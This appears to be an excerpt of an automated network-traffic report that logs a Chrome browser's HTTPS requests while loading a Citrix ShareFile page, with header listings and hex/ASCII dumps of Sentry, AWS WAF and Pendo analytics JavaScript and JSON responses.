                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 61 6d 65 3d 74 2e 6e 61 6d 65 7c 7c 22 22 2c 74 68 69 73 2e 5f 6d 65 74 61 64 61 74 61 3d 7b 2e 2e 2e 74 2e 6d 65 74 61 64 61 74 61 7d 2c 74 68 69 73 2e 5f 74 72 69 6d 45 6e 64 3d 74 2e 74 72 69 6d 45 6e 64 2c 74 68 69 73 2e 74 72 61 6e 73 61 63 74 69 6f 6e 3d 74 68 69 73 3b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 5f 6d 65 74 61 64 61 74 61 2e 64 79 6e 61 6d 69 63 53 61 6d 70 6c 69 6e 67 43 6f 6e 74 65 78 74 3b 6e 26 26 28 74 68 69 73 2e 5f 66 72 6f 7a 65 6e 44 79 6e 61 6d 69 63 53 61 6d 70 6c 69 6e 67 43 6f 6e 74 65 78 74 3d 7b 2e 2e 2e 6e 7d 29 7d 67 65 74 20 6e 61 6d 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6e 61 6d 65 7d 73 65 74 20 6e 61 6d 65 28 74 29 7b 74 68 69 73 2e 73 65 74 4e 61 6d 65 28 74 29 7d 67 65 74 20 6d 65 74 61 64 61 74 61 28
                                                                                                                                                                                                                      Data Ascii: ame=t.name||"",this._metadata={...t.metadata},this._trimEnd=t.trimEnd,this.transaction=this;const n=this._metadata.dynamicSamplingContext;n&&(this._frozenDynamicSamplingContext={...n})}get name(){return this._name}set name(t){this.setName(t)}get metadata(
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 73 64 6b 3d 7b 6e 61 6d 65 3a 60 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 24 7b 65 7d 60 2c 70 61 63 6b 61 67 65 73 3a 6e 2e 6d 61 70 28 28 74 3d 3e 28 7b 6e 61 6d 65 3a 60 24 7b 72 7d 3a 40 73 65 6e 74 72 79 2f 24 7b 74 7d 60 2c 76 65 72 73 69 6f 6e 3a 56 74 7d 29 29 29 2c 76 65 72 73 69 6f 6e 3a 56 74 7d 29 2c 74 2e 5f 6d 65 74 61 64 61 74 61 3d 73 7d 76 61 72 20 76 73 3d 6e 28 36 38 35 31 38 29 3b 63 6f 6e 73 74 20 62 73 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 53 45 4e 54 52 59 5f 44 45 42 55 47 5f 5f 7c 7c 5f 5f 53 45 4e 54 52 59 5f 44 45 42 55 47 5f 5f 3b 66 75 6e 63 74 69 6f 6e 20 53 73 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 77 73 28 74 2c 65 29 2c 72 3d 7b 74 79 70 65 3a 65 26 26 65 2e 6e 61 6d 65 2c 76
                                                                                                                                                                                                                      Data Ascii: sdk={name:`sentry.javascript.${e}`,packages:n.map((t=>({name:`${r}:@sentry/${t}`,version:Vt}))),version:Vt}),t._metadata=s}var vs=n(68518);const bs="undefined"==typeof __SENTRY_DEBUG__||__SENTRY_DEBUG__;function Ss(t,e){const n=ws(t,e),r={type:e&&e.name,v
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 67 65 72 70 72 69 6e 74 3b 69 66 28 21 6e 26 26 21 72 29 72 65 74 75 72 6e 21 30 3b 69 66 28 6e 26 26 21 72 7c 7c 21 6e 26 26 72 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 72 65 74 75 72 6e 21 28 6e 2e 6a 6f 69 6e 28 22 22 29 21 3d 3d 72 2e 6a 6f 69 6e 28 22 22 29 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 6f 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 65 78 63 65 70 74 69 6f 6e 26 26 74 2e 65 78 63 65 70 74 69 6f 6e 2e 76 61 6c 75 65 73 26 26 74 2e 65 78 63 65 70 74 69 6f 6e 2e 76 61 6c 75 65 73 5b 30 5d 7d 66 75 6e 63 74 69 6f 6e 20 55 6f 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 65 78 63 65 70 74 69 6f 6e 3b 69 66 28 65 29 74 72 79 7b 72 65 74 75 72 6e 20 65 2e 76 61 6c 75 65 73 5b 30 5d 2e 73 74 61 63 6b 74
                                                                                                                                                                                                                      Data Ascii: gerprint;if(!n&&!r)return!0;if(n&&!r||!n&&r)return!1;try{return!(n.join("")!==r.join(""))}catch(t){return!1}}function Bo(t){return t.exception&&t.exception.values&&t.exception.values[0]}function Uo(t){const e=t.exception;if(e)try{return e.values[0].stackt
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 6e 2c 72 2c 73 29 3a 72 3a 52 61 28 74 2c 72 29 3a 72 7d 66 75 6e 63 74 69 6f 6e 20 44 61 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 28 22 76 69 64 65 6f 22 3d 3d 3d 74 7c 7c 22 61 75 64 69 6f 22 3d 3d 3d 74 29 26 26 22 61 75 74 6f 70 6c 61 79 22 3d 3d 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 61 28 74 2c 65 2c 6e 3d 31 2f 30 2c 72 3d 30 29 7b 72 65 74 75 72 6e 20 74 3f 74 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 74 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 7c 7c 72 3e 6e 3f 2d 31 3a 65 28 74 29 3f 72 3a 4e 61 28 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 65 2c 6e 2c 72 2b 31 29 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 4c 61 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 6e 3d 3e 7b 63 6f 6e 73 74 20 72 3d 6e 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 72 29 72 65 74 75 72 6e 21 31 3b 74 72
                                                                                                                                                                                                                      Data Ascii: n,r,s):r:Ra(t,r):r}function Da(t,e,n){return("video"===t||"audio"===t)&&"autoplay"===e}function Na(t,e,n=1/0,r=0){return t?t.nodeType!==t.ELEMENT_NODE||r>n?-1:e(t)?r:Na(t.parentNode,e,n,r+1):-1}function La(t,e){return n=>{const r=n;if(null===r)return!1;tr
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 65 28 29 2e 68 6f 73 74 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 61 63 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 69 66 28 21 65 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 2c 6e 3d 74 3b 66 6f 72 28 3b 65 3d 69 63 28 6e 29 3b 29 6e 3d 65 3b 72 65 74 75 72 6e 20 6e 7d 28 74 29 3b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 74 61 69 6e 73 28 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 63 63 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 21 21 65 26 26 28 65 2e 63 6f 6e 74 61 69 6e 73 28 74 29 7c 7c 61 63 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 75 63 28 2e 2e 2e 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                      Data Ascii: e().host),e}function ac(t){const e=t.ownerDocument;if(!e)return!1;const n=function(t){let e,n=t;for(;e=ic(n);)n=e;return n}(t);return e.contains(n)}function cc(t){const e=t.ownerDocument;return!!e&&(e.contains(t)||ac(t))}function uc(...t){return function(


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      13192.168.2.174972413.248.193.2514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC586OUTGET /sf/v3/Accounts/Branding HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sf-api.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Accept: application/json, text/plain, */*
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1691INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:05 GMT
                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                      Content-Length: 2996
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=kcacQpXWo2/n9WIEBYCjup/TiLyy1YN3rksFjWFkA4qc8LQBhXs2CsF2Ddb8vZOdcEsS6CHblDPLdLgoWYTw8TIW/vjRPvExUyi2oVGBbsNuMCdZW0E+9lxecxz1w/zs3tc51+rnLcQHBQlpz/sJ/8zaOIx3TtbueixkoXXFHd2J; Expires=Tue, 12 Nov 2024 19:36:05 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=kcacQpXWo2/n9WIEBYCjup/TiLyy1YN3rksFjWFkA4qc8LQBhXs2CsF2Ddb8vZOdcEsS6CHblDPLdLgoWYTw8TIW/vjRPvExUyi2oVGBbsNuMCdZW0E+9lxecxz1w/zs3tc51+rnLcQHBQlpz/sJ/8zaOIx3TtbueixkoXXFHd2J; Expires=Tue, 12 Nov 2024 19:36:05 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=bBYtQMvH4SMfqQ3yY3v0x9VBqt2wrRPPPG0F7qmHv4xYuko4DvQJcOQ3xzvev5Lg5NnOJQl9NuX9qgoO57GQWBO7/UpCvS1f4U+FuZIhq9dOipt89j4yIz/O2HB7; Expires=Tue, 12 Nov 2024 19:36:05 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=bBYtQMvH4SMfqQ3yY3v0x9VBqt2wrRPPPG0F7qmHv4xYuko4DvQJcOQ3xzvev5Lg5NnOJQl9NuX9qgoO57GQWBO7/UpCvS1f4U+FuZIhq9dOipt89j4yIz/O2HB7; Expires=Tue, 12 Nov 2024 19:36:05 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Access-Control-Expose-Headers: Authorization
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      Expires: Mon, 04 Nov 2024 19:36:05 GMT
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      Citrix-TransactionId: 08474dd3-c9f9-46f0-a237-6f55c0077ed6
                                                                                                                                                                                                                      CorrelationId: 7wlu75qeyEGx7Jo9vejqSg
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                      X-Robots-Tag: noindex
                                                                                                                                                                                                                      X-SFAPI-AccountId: a2686d04-5eab-df7f-5602-cc391d4b2e38
                                                                                                                                                                                                                      X-SFAPI-OAuthClientId:
                                                                                                                                                                                                                      X-SFAPI-AppCode: _None
                                                                                                                                                                                                                      X-SFAPI-RequestID: Uhe95a1w3EKJm6zLsa1oEg
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC2996INData Raw: 7b 22 43 6f 6d 70 61 6e 79 4e 61 6d 65 22 3a 22 41 76 65 72 65 6c 6c 48 61 72 72 69 6d 61 6e 22 2c 22 55 73 65 41 64 76 61 6e 63 65 64 43 75 73 74 6f 6d 42 72 61 6e 64 69 6e 67 22 3a 66 61 6c 73 65 2c 22 41 64 76 61 6e 63 65 64 43 75 73 74 6f 6d 42 72 61 6e 64 69 6e 67 46 6f 6c 64 65 72 4e 61 6d 65 22 3a 22 22 2c 22 42 72 61 6e 64 69 6e 67 53 74 79 6c 65 73 22 3a 7b 7d 2c 22 42 72 61 6e 64 69 6e 67 4c 69 6e 6b 73 22 3a 7b 22 6f 64 61 74 61 2e 74 79 70 65 22 3a 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 42 72 61 6e 64 69 6e 67 4c 69 6e 6b 73 22 7d 2c 22 4c 6f 67 6f 55 52 4c 22 3a 22 22 2c 22 50 72 65 66 65 72 65 6e 63 65 73 22 3a 7b 22 45 6e 61 62 6c 65 43 6c 69 65 6e 74 53 65 6e 64 22 3a 66 61 6c 73 65 2c 22 45 6e 61 62 6c 65 53 53
                                                                                                                                                                                                                      Data Ascii: {"CompanyName":"AverellHarriman","UseAdvancedCustomBranding":false,"AdvancedCustomBrandingFolderName":"","BrandingStyles":{},"BrandingLinks":{"odata.type":"ShareFile.Api.Models.BrandingLinks"},"LogoURL":"","Preferences":{"EnableClientSend":false,"EnableSS


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      14192.168.2.174972618.239.18.504437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC650OUTPOST /0093b71e39a6/478ed03bbf12/verify HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Content-Length: 8703
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC8703OUTData Raw: 7b 22 63 68 61 6c 6c 65 6e 67 65 22 3a 7b 22 69 6e 70 75 74 22 3a 22 65 79 4a 32 5a 58 4a 7a 61 57 39 75 49 6a 6f 78 4c 43 4a 31 59 6d 6c 6b 49 6a 6f 69 4d 32 45 34 4f 44 64 68 59 32 51 74 4e 32 59 32 4e 69 30 30 4e 6a 46 68 4c 57 45 34 59 54 4d 74 4e 54 45 78 59 6d 49 79 59 6a 6b 35 59 7a 52 69 49 69 77 69 59 58 52 30 5a 57 31 77 64 46 39 70 5a 43 49 36 49 6a 49 7a 4d 32 4d 79 4f 44 4e 69 4c 54 59 7a 4e 6a 6b 74 4e 44 63 79 59 53 31 69 4e 6a 5a 6d 4c 54 67 77 4d 57 4a 6b 5a 54 49 79 4d 47 45 30 4f 53 49 73 49 6d 4e 79 5a 57 46 30 5a 56 39 30 61 57 31 6c 49 6a 6f 69 4d 6a 41 79 4e 43 30 78 4d 53 30 77 4e 56 51 78 4f 54 6f 7a 4e 6a 6f 77 4d 69 34 77 4f 54 45 35 4e 7a 49 79 4f 44 6c 61 49 69 77 69 5a 47 6c 6d 5a 6d 6c 6a 64 57 78 30 65 53 49 36 4f 43 77 69
                                                                                                                                                                                                                      Data Ascii: {"challenge":{"input":"eyJ2ZXJzaW9uIjoxLCJ1YmlkIjoiM2E4ODdhY2QtN2Y2Ni00NjFhLWE4YTMtNTExYmIyYjk5YzRiIiwiYXR0ZW1wdF9pZCI6IjIzM2MyODNiLTYzNjktNDcyYS1iNjZmLTgwMWJkZTIyMGE0OSIsImNyZWF0ZV90aW1lIjoiMjAyNC0xMS0wNVQxOTozNjowMi4wOTE5NzIyODlaIiwiZGlmZmljdWx0eSI6OCwi
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      Content-Length: 296
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:05 GMT
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73a5-2ae48de7610a7965356b5574
                                                                                                                                                                                                                      access-control-max-age: 86400
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-allow-methods: OPTIONS,GET,POST
                                                                                                                                                                                                                      cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                      Via: 1.1 668006c1cb101e4e3461ceae5f2ccbe2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: s-m--LuBpIPrp3zovDieskYEwxyJi6ufFSzpoih8A27lIUvTc7ggCQ==
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC296INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 31 32 62 66 39 37 35 31 2d 61 31 32 36 2d 34 32 64 35 2d 62 30 35 38 2d 64 33 35 62 33 61 61 34 32 34 34 61 3a 45 51 6f 41 67 69 43 49 30 47 45 46 41 51 41 41 3a 2b 53 4e 68 37 6d 76 51 77 6c 50 2f 61 37 62 4f 72 6b 42 4f 30 4c 42 58 69 57 41 47 74 45 50 39 64 2b 42 6c 57 64 75 70 46 67 52 42 7a 77 71 59 35 56 32 74 66 42 66 75 64 42 76 2f 7a 59 57 38 39 34 5a 77 33 50 70 4b 48 71 4c 68 52 49 52 73 62 47 79 4f 79 30 64 38 76 4d 64 4c 51 47 73 38 4e 30 77 2f 72 66 36 75 79 49 54 67 41 64 53 43 4a 4f 67 36 73 37 4e 67 68 30 36 52 55 2b 61 71 59 57 4d 50 67 67 55 43 4f 36 33 45 34 57 66 6e 6c 5a 73 4c 33 56 6d 61 47 49 69 72 6d 69 64 37 69 69 6f 36 75 59 34 6b 33 77 43 62 55 4a 67 4a 54 75 63 78 75 58 57 2f 46 4a 55 37 59 41 6b
                                                                                                                                                                                                                      Data Ascii: {"token":"12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAgiCI0GEFAQAA:+SNh7mvQwlP/a7bOrkBO0LBXiWAGtEP9d+BlWdupFgRBzwqY5V2tfBfudBv/zYW894Zw3PpKHqLhRIRsbGyOy0d8vMdLQGs8N0w/rf6uyITgAdSCJOg6s7Ngh06RU+aqYWMPggUCO63E4WfnlZsL3VmaGIirmid7iio6uY4k3wCbUJgJTucxuXW/FJU7YAk


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      15192.168.2.174972934.111.138.514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC424OUTGET /agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js HTTP/1.1
                                                                                                                                                                                                                      Host: citrix-sharefile-content.customer.pendo.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC915INHTTP/1.1 200 OK
                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-expose-headers: *
                                                                                                                                                                                                                      server: istio-envoy
                                                                                                                                                                                                                      x-goog-generation: 1730834129684014
                                                                                                                                                                                                                      x-goog-hash: crc32c=kMzVNA==
                                                                                                                                                                                                                      x-goog-hash: md5=puttd4bmM4HNozb8zKFVbg==
                                                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                                                      x-goog-stored-content-encoding: gzip
                                                                                                                                                                                                                      x-goog-stored-content-length: 165113
                                                                                                                                                                                                                      x-guploader-uploadid: AHmUCY1LOCYlz8g38LsdcW7v6-aodFwCUbW4jmrd_QQhzZhK0ZXjXOcYCFyDWPXsPjEds7ht21IHopx_Uw
                                                                                                                                                                                                                      x-envoy-upstream-service-time: 37
                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:04 GMT
                                                                                                                                                                                                                      Expires: Tue, 05 Nov 2024 19:43:34 GMT
                                                                                                                                                                                                                      Cache-Control: max-age=450
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 19:15:29 GMT
                                                                                                                                                                                                                      ETag: "a6eb6d7786e63381cda336fccca1556e"
                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                                                      Alt-Svc: clear
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC463INData Raw: 38 30 30 30 0d 0a 2f 2f 20 50 65 6e 64 6f 20 41 67 65 6e 74 20 57 72 61 70 70 65 72 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 50 65 6e 64 6f 2e 69 6f 2c 20 49 6e 63 2e 0a 2f 2f 20 45 6e 76 69 72 6f 6e 6d 65 6e 74 3a 20 20 20 20 70 72 6f 64 75 63 74 69 6f 6e 0a 2f 2f 20 41 67 65 6e 74 20 56 65 72 73 69 6f 6e 3a 20 20 32 2e 32 35 33 2e 31 0a 2f 2f 20 49 6e 73 74 61 6c 6c 65 64 3a 20 20 20 20 20 20 32 30 32 34 2d 31 31 2d 30 35 54 31 39 3a 31 35 3a 32 38 5a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 50 65 6e 64 6f 43 6f 6e 66 69 67 29 20 7b 0a 2f 2a 0a 40 6c 69 63 65 6e 73 65 20 68 74 74 70 73 3a 2f 2f 61 67 65 6e 74 2e 70 65 6e 64 6f 2e 69 6f 2f 6c 69 63 65 6e 73 65 73 0a 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 72 77 2c 6f 77 2c 61 77 29 7b 21 66 75
                                                                                                                                                                                                                      Data Ascii: 8000// Pendo Agent Wrapper// Copyright 2024 Pendo.io, Inc.// Environment: production// Agent Version: 2.253.1// Installed: 2024-11-05T19:15:28Z(function (PendoConfig) {/*@license https://agent.pendo.io/licenses*/!function(rw,ow,aw){!fu
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 29 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 72 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6f 3d 65 7c 7c 30 2c 61 3d 28 74 3c 30 3f 72 2b 74 3a 74 7c 7c 72 29 2d 28 6f 3d 30 3c 3d 6f 3f 6f 3a 72 2b 6f 29 3b 69 66 28 30 3c 61 29 69 66 28 69 3d 6e 65 77 20 41 72 72 61 79 28 61 29 2c 74 68 69 73 2e 63 68 61 72 41 74 29 66 6f 72 28 6e 3d 30 3b 6e 3c 61 3b 6e 2b 2b 29 69 5b 6e 5d 3d 74 68 69 73 2e 63 68 61 72 41 74 28 6f 2b 6e 29 3b 65 6c 73 65 20 66 6f 72 28 6e 3d 30 3b 6e 3c 61 3b 6e 2b 2b 29 69 5b 6e 5d 3d 74 68 69 73 5b 6f 2b 6e 5d 3b 72 65 74 75 72 6e 20 69 7d 7d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 3d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: .call(this,e,t);var n,i=[],r=this.length,o=e||0,a=(t<0?r+t:t||r)-(o=0<=o?o:r+o);if(0<a)if(i=new Array(a),this.charAt)for(n=0;n<a;n++)i[n]=this.charAt(o+n);else for(n=0;n<a;n++)i[n]=this[o+n];return i}}String.prototype.trim||(String.prototype.trim=function
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6c 28 21 30 29 2e 75 70 64 61 74 65 28 65 29 5b 74 5d 28 29 7d 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 61 28 22 68 65 78 22 29 3b 28 74 3d 69 3f 63 28 74 29 3a 74 29 2e 63 72 65 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6c 7d 2c 74 2e 75 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 72 65 61 74 65 28 29 2e 75 70 64 61 74 65 28 65 29 7d 3b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 65 29 7b 76 61 72 20 6e 3d 72 5b 65 5d 3b 74 5b 6e 5d 3d 61 28 6e 29 7d 72 65 74 75 72 6e 20 74 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 65 76 61 6c 28 22 72 65 71 75 69 72 65 28
                                                                                                                                                                                                                      Data Ascii: n(e){return new l(!0).update(e)[t]()}},d=function(){var t=a("hex");(t=i?c(t):t).create=function(){return new l},t.update=function(e){return t.create().update(e)};for(var e=0;e<r.length;++e){var n=r[e];t[n]=a(n)}return t},c=function(t){var n=eval("require(
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 5d 7c 3d 28 31 39 32 7c 74 3e 3e 36 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 3a 28 74 3c 35 35 32 39 36 7c 7c 35 37 33 34 34 3c 3d 74 3f 61 5b 6e 3e 3e 32 5d 7c 3d 28 32 32 34 7c 74 3e 3e 31 32 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 3a 28 74 3d 36 35 35 33 36 2b 28 28 31 30 32 33 26 74 29 3c 3c 31 30 7c 31 30 32 33 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 32 34 30 7c 74 3e 3e 31 38 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 74 3e 3e 31 32 26 36 33 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 74 3e 3e 36 26 36 33 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 36 33 26 74 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 3b 74 68 69
                                                                                                                                                                                                                      Data Ascii: ]|=(192|t>>6)<<u[3&n++]:(t<55296||57344<=t?a[n>>2]|=(224|t>>12)<<u[3&n++]:(t=65536+((1023&t)<<10|1023&e.charCodeAt(++r)),a[n>>2]|=(240|t>>18)<<u[3&n++],a[n>>2]|=(128|t>>12&63)<<u[3&n++]),a[n>>2]|=(128|t>>6&63)<<u[3&n++]),a[n>>2]|=(128|63&t)<<u[3&n++]);thi
